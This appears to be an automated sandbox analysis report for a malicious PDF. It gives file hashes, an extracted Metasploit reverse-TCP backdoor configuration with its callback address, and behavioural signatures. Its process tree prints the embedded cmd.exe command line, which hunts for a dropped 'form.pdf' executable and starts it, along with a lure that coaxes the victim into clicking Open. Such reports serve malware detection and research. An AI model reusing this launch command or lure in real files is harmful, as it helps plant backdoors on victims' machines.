Overview

overview

10

Static

static

10

c639c49c1f...71.pdf

windows7-x64

10

c639c49c1f...71.pdf

windows10-2004-x64

3

form.exe

windows7-x64

10

form.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-09-2024 12:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c639c49c1fa2c581f4ebd065591f6800f9c0178ad8235768be9fe640d346d471.pdf

  • Size

    58KB

  • MD5

    3adde4fdff788093d385f22601c4488e

  • SHA1

    2ec40ed80fc962ce51c7b3fbe2f9360ba806424f

  • SHA256

    c639c49c1fa2c581f4ebd065591f6800f9c0178ad8235768be9fe640d346d471

  • SHA512

    eeee1c886f4a366523284e47670dc179e95a1eaaed3738fd6e4f614beff178939abbeae04873906b2cb7fb57c48cd378880391dfe30f7893011464c80ee9dbae

  • SSDEEP

    768:TLcuNY8Dgm5XgDzsW1D4DBei8bWcYYy1ZrgtDhDUs1Nt615YNl3HkhNFksBy8DuT:TLcUj5w0W1Dz1biLsSsN8ANuFdtd6

Score
10/10
metasploitbackdoordiscoverytrojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

10.0.2.15:443

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\c639c49c1fa2c581f4ebd065591f6800f9c0178ad8235768be9fe640d346d471.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\form.pdf" (cd "Desktop"))&(if exist "My Documents\form.pdf" (cd "My Documents"))&(if exist "Documents\form.pdf" (cd "Documents"))&(if exist "Escritorio\form.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\form.pdf" (cd "Mis Documentos"))&(start form.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2716
      • \??\c:\Users\Admin\Documents\form.pdf
        form.pdf
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2588

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
    Filesize

    3KB

    MD5

    0810dfdda56cfb5299be0c4842df9b24

    SHA1

    5dcd7dafada8cd186785d08fe99174cce500d6a5

    SHA256

    fc9454f39686ec5b91c36dd6bfc357f71d7eccc889ebc833a2058d58c1584f99

    SHA512

    a068053dd2faa331e79a6e2337efd7cc202c80ea74082e1f993976d6917a4ca14206fd6c6fe2fc958e82eeb92e37a233425e71a7ae2578428d1e1b1318bfea21

    Download Submit

  • \Users\Admin\Documents\form.pdf
    Filesize

    72KB

    MD5

    081fc5f9ef8ccf9b362b48bc4d66a269

    SHA1

    aa5bd818fb2a5c9d3591658439524f40cd2cc706

    SHA256

    48c6949a16fef947addfb644d1345224e6e4cacc4ebef750be0f3f85f8bda733

    SHA512

    80bdf5e06c8443c72ec7fe9893f490869cbe67afc95aabe48300a8a4282999048a5f691936d194ff22e9e27f79778d04cddb4332f275659cfaa17a972fc2be96

    Download Submit